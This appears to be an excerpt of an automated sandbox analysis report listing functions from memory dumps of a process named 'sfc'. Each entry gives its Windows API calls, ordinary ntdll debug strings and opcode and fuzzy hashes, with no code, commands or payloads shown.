                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 2fb760c5b7c822af1ff21714c29907829619677d40777e10c525f560c0d2039e
                                                                                                                      • Instruction ID: 04c9b24f79b75e3ba4d646ca229986585ce52a65d91f2c14c710bd213baede6b
                                                                                                                      • Opcode Fuzzy Hash: 2fb760c5b7c822af1ff21714c29907829619677d40777e10c525f560c0d2039e
                                                                                                                      • Instruction Fuzzy Hash: 5CE065B26002047FC610EE98DC40F9B77ADEF88710F00440AFA08A7281DA71B8108AB4
                                                                                                                      Function 02A97710 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02A9773C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 273969da97b27ad48dc3933f07eb015daad814bbcf569d8896fc0a86069f4800
                                                                                                                      • Instruction ID: afa1f7f9f2aef63644b7c9ab9d4ddfc62707f1720c1695d01f53b9df1788b088
                                                                                                                      • Opcode Fuzzy Hash: 273969da97b27ad48dc3933f07eb015daad814bbcf569d8896fc0a86069f4800
                                                                                                                      • Instruction Fuzzy Hash: ADE0207536020467EF206B6CDC85F63738D4B84B38F240550B81CDB1C1DAB5F5018560
                                                                                                                      Function 02A97517 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02A91350,02AA6757,02AA4037,?), ref: 02A97553
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 7e81b43ae4b6ef17bc2ae83cfedbb294efdaf18d208bf25106780d5c74990603
                                                                                                                      • Instruction ID: aca41b10a1c2311bfe247ad9f90291b052601b680fa7a958ac7f74161742d8a4
                                                                                                                      • Opcode Fuzzy Hash: 7e81b43ae4b6ef17bc2ae83cfedbb294efdaf18d208bf25106780d5c74990603
                                                                                                                      • Instruction Fuzzy Hash: 85E0267269020436E600BBB59C56F96BFCE5F55704F084468F58CD7282DE62A210CE51
                                                                                                                      Function 02A97520 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02A91350,02AA6757,02AA4037,?), ref: 02A97553
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: e7297ba3f4be8ff9d63b5e1ac3a7d4b6b1ec138b2ba915830476c4538bc55a17
                                                                                                                      • Instruction ID: 64c9501d33b27455b85152fe80ae1e6cf027234dbf8bceb269729b4dbf838039
                                                                                                                      • Opcode Fuzzy Hash: e7297ba3f4be8ff9d63b5e1ac3a7d4b6b1ec138b2ba915830476c4538bc55a17
                                                                                                                      • Instruction Fuzzy Hash: CDD02EB23D02083BEA00B6E48C06F5736CEAB80304F000424BA0CEB2C2ED62F2008DA2
                                                                                                                      Function 031E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 904fa62f5ec1d7148a414cf64e666ea1c98de3dd78f940e21571cdaa54bf66e2
                                                                                                                      • Instruction ID: b53db34cac3088ce572662b318e6a95f9dcf10019d7e72ebd2e0d149238fb327
                                                                                                                      • Opcode Fuzzy Hash: 904fa62f5ec1d7148a414cf64e666ea1c98de3dd78f940e21571cdaa54bf66e2
                                                                                                                      • Instruction Fuzzy Hash: 65B09B71901DD5CBDE11F76047087177954A7D5701F29C561D3030741E4739C1D1E175

                                                                                                                      Non-executed Functions

                                                                                                                      Function 02A8DAC6 Relevance: .0, Instructions: 18COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: adf88e543f754da03870287232dbbedb6454e3c33b095f5c5343fef9c65f1e13
                                                                                                                      • Instruction ID: 3f0d5e0dd50ee81c1084a08a17aec6fe32c13eea35d8cd2de2a5913895da4f4b
                                                                                                                      • Opcode Fuzzy Hash: adf88e543f754da03870287232dbbedb6454e3c33b095f5c5343fef9c65f1e13
                                                                                                                      • Instruction Fuzzy Hash: 66C02222A0010901C2140C2CE6405F8F760EBC7222F2010D6D40893824C302CC9700C8
                                                                                                                      Function 031E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: cf46dd7a0c29f51ce154095655729235e8301ec0f28ae11bdc8514358054f5b7
                                                                                                                      • Instruction ID: b0b8d538c0c8cd11e23034a755d2d0235b853ddba207f6adc92ec23f08ac8f9e
                                                                                                                      • Opcode Fuzzy Hash: cf46dd7a0c29f51ce154095655729235e8301ec0f28ae11bdc8514358054f5b7
                                                                                                                      • Instruction Fuzzy Hash: 8D5126B6A04616BFCB24EB988DA097EF7FCBB0C2007188569E465D7241D375DE51CBA0
                                                                                                                      Function 031D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Execute=1, xrefs: 03214713
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03214742
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03214725
                                                                                                                      • ExecuteOptions, xrefs: 032146A0
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03214655
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03214787
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032146FC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: f9071702f9e63bb663d1252675d9d158602c010cd3a5b346e9b5d59bb685de05
                                                                                                                      • Instruction ID: a67bd35659886c942e5692a9883c90f8a5630cea1cecbbe8f969b0b6789efc85
                                                                                                                      • Opcode Fuzzy Hash: f9071702f9e63bb663d1252675d9d158602c010cd3a5b346e9b5d59bb685de05
                                                                                                                      • Instruction Fuzzy Hash: D4512836A003197BEB20EFA5EC89BAE77B8AF0D704F0405A9D505AB1C1E7719A818F54
                                                                                                                      Function 031EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: 41b50cc63ee38ac3fac0538dd0e5a950e7d1667bef7cb2b42364bdfccd73afba
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 93818174E0DA499BDF28CE68C851BBEBBA5AF4D350F1CC15AD861A77D0C7369880CB50
                                                                                                                      Function 031CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032102E7
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032102BD
                                                                                                                      • RTL: Re-Waiting, xrefs: 0321031E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 079a294d0d5b86560554673bdcec7130e241f27bb3a18476681ac98468b07f1c
                                                                                                                      • Instruction ID: 61cbc37d5aff5b1191d4116b00ecf641dd89febf3a8f2ce97dc59c80f39cc995
                                                                                                                      • Opcode Fuzzy Hash: 079a294d0d5b86560554673bdcec7130e241f27bb3a18476681ac98468b07f1c
                                                                                                                      • Instruction Fuzzy Hash: ADE10130624782DFD724CF28C984B2AB7E1BF98714F184A6DF4A58B2D0D774D896CB42
                                                                                                                      Function 031DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03217B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 03217B8E
                                                                                                                      • RTL: Re-Waiting, xrefs: 03217BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: d8b5c7063907135901e0b16e01c22b8b82a3c677bcfb073e02da0228756b5192
                                                                                                                      • Instruction ID: 2b7cb1725c49b4cae23fe277082519d2649ac6a9fe3d3ffc870db1a9bac47133
                                                                                                                      • Opcode Fuzzy Hash: d8b5c7063907135901e0b16e01c22b8b82a3c677bcfb073e02da0228756b5192
                                                                                                                      • Instruction Fuzzy Hash: E841F2353047029FCB24DE29CD40B6BB7E5EF8E710F154A2DE85A9B280DB71E5458B91
                                                                                                                      Function 031DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0321728C
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 032172A3
                                                                                                                      • RTL: Re-Waiting, xrefs: 032172C1
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03217294
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: 01375cee7616af6082ad0a28646fb01e273ecf622ba024126b5a01bfe938670f
                                                                                                                      • Instruction ID: 2313c4c5d848295176e007e89b2412245b3c6fbb7680cfce541bcab3fea6f508
                                                                                                                      • Opcode Fuzzy Hash: 01375cee7616af6082ad0a28646fb01e273ecf622ba024126b5a01bfe938670f
                                                                                                                      • Instruction Fuzzy Hash: 66411036714202ABC720DE28CD41B6AF7E5FF99710F254619F856AB240DB31E8928BD0
                                                                                                                      Function 031E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: 53d761edec9fdfa526f8af6e3ecac50be94bfa7a7aae3c83dd73b93b0800c64f
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 9191A670E00A169BEF28DE69C8906BEF7A5FF4C720F18451AE875E72C0E73299818750
                                                                                                                      Function 031A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 4ce2b45c524a2a5af54c8169b70acfd3ff72b953e2b7a2e6520158ea9e06bb9c
                                                                                                                      • Instruction ID: 77d377bb0e5bacf3ea14e02210ef89500707029a976f5038ebd56bc9e93a0b0e
                                                                                                                      • Opcode Fuzzy Hash: 4ce2b45c524a2a5af54c8169b70acfd3ff72b953e2b7a2e6520158ea9e06bb9c
                                                                                                                      • Instruction Fuzzy Hash: DF813975D10269DBDB25DB94CC48BEEB7B8AB08750F0445EAE919B7280D7709EC4CFA0